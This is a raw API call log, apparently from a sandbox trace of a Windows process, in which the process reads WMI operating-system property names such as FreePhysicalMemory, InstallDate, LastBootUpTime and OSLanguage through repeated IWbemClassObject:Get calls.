[0059.029] IWbemClassObject:Get (in: This=0x21dbef8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] IWbemClassObject:Get (in: This=0x21dbef8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Description", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Distributed", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.029] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.029] IWbemClassObject:Get (in: This=0x21dc090, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc090, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Distributed", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="EncryptionLevel", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc228, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc228, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="EncryptionLevel", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ForegroundApplicationBoost", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc3c0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc3c0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="ForegroundApplicationBoost", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="FreePhysicalMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.030] IWbemClassObject:Get (in: This=0x21dc3c0, wszName="Description", lFlags=0, pVal=0xcf2bc*(varType=0x0, wReserved1=0x7570, wReserved2=0xe3d2, wReserved3=0xc473, varVal1=0x0, varVal2=0x7ed68), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2bc*(varType=0x8, wReserved1=0x7570, wReserved2=0xe3d2, wReserved3=0xc473, varVal1="Number of kilobytes of physical memory currently unused and available", varVal2=0x7ed68), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] IWbemClassObject:Get (in: This=0x21dc3c0, wszName="Qualifiers", lFlags=0, pVal=0xcf278*(varType=0x0, wReserved1=0x0, wReserved2=0x98cd, wReserved3=0x7570, varVal1=0x70000, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf278*(varType=0x1, wReserved1=0x0, wReserved2=0x98cd, wReserved3=0x7570, varVal1=0x70000, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] ??1CHString@@QAE@XZ () returned 0x6f900504
[0059.031] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.031] IWbemClassObject:Get (in: This=0x21dc558, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x0, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1=0x289744, varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] IWbemClassObject:Get (in: This=0x21dc558, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x0, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1=0x28977c, varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="FreeSpaceInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.031] IWbemClassObject:Get (in: This=0x21dc6f0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] IWbemClassObject:Get (in: This=0x21dc6f0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="FreeSpaceInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="FreeVirtualMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.031] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dc888, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dc888, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="FreeVirtualMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="InstallDate", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dca20, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="InstallDate", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dca20, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="InstallDate", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="LastBootUpTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dcbb8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="LastBootUpTime", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] IWbemClassObject:Get (in: This=0x21dcbb8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="LastBootUpTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="LocalDateTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.032] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dcd50, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="LocalDateTime", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dcd50, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="LocalDateTime", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Locale", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.033] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dcee8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Locale", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dcee8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Locale", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Manufacturer", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.033] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dd080, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Manufacturer", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.033] IWbemClassObject:Get (in: This=0x21dd080, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Manufacturer", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="MaxNumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd218, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="MaxNumberOfProcesses", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd218, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="MaxNumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="MaxProcessMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd3b0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="MaxProcessMemorySize", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd3b0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="MaxProcessMemorySize", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Name", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd548, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Name", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd548, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Name", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfLicensedUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd6e0, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfLicensedUsers", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.034] IWbemClassObject:Get (in: This=0x21dd6e0, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfLicensedUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21dd878, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfProcesses", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21dd878, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfProcesses", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21dda10, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="NumberOfUsers", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21dda10, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="NumberOfUsers", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Organization", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21ddba8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Organization", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21ddba8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Organization", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSLanguage", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21e1900, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSLanguage", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21e1900, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSLanguage", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSProductSuite", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21e1a98, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSProductSuite", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.035] IWbemClassObject:Get (in: This=0x21e1a98, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSProductSuite", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1c30, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OSType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1c30, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OSType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OtherTypeDescription", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1dc8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="OtherTypeDescription", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1dc8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="OtherTypeDescription", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="PlusProductID", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1f60, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="PlusProductID", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e1f60, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="PlusProductID", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="PlusVersionNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e20f8, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="PlusVersionNumber", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e20f8, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="PlusVersionNumber", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Primary", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e2290, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
[0059.036] IWbemClassObject:Get (in: This=0x21e2290, wszName="Derivation", lFlags=0, pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="Primary", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf368*(varType=0x8, wReserved1=0x0, wReserved2=0xed60, wReserved3=0x7, varVal1="QuantumLength", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0059.037] SafeArrayGetElement (in: psa=0x276888, rgIndices=0xcf418, pv=0xcf444 | out: pv=0xcf444) returned 0x0
[0059.037] IWbemClassObject:Get (in: This=0x21e2428, wszName="Name", lFlags=0, pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0xc473e296), pType=0x0, plFlavor=0x0 | out: pVal=0xcf378*(varType=0x8, wReserved1=0x7, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0xc473e296), pType=0x0, plFlavor=0x0) returned 0x0
